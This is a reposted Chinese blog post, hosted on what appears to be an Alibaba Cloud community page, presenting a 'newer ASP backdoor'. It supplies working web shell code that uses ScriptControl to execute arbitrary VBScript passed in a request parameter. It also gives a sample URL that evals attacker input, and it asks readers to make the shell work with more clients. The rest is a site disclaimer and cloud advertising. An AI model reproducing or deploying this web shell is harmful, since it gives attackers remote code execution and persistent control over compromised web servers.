一個較新的ASP後門服務端實現代碼

來源:互聯網
上載者:User

今天重新研究了下VB裡面的ScriptControl組件,發現asp裡面也能調用。研究了下方法,後來和lcx討論了下。得到了如下代碼,在此感謝前輩的指點,呵呵。

代碼很簡單,我就不多做解釋了,以免有人罵我裝。

複製代碼 代碼如下:<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '參數SubCode作為過程代碼
o.run "e",Server,Response,Request,Application,Session,Error '參數名e 調用之,同時壓入6個基底物件作為參數

'調用樣本:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
%>

注意,雖然能用了,但是實驗發現只有lake2用戶端能用。希望有牛人出來改得通用一點。呵呵。自己寫個用戶端專用也不錯。

轉自:http://hi.baidu.com/ylbhz/blog

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.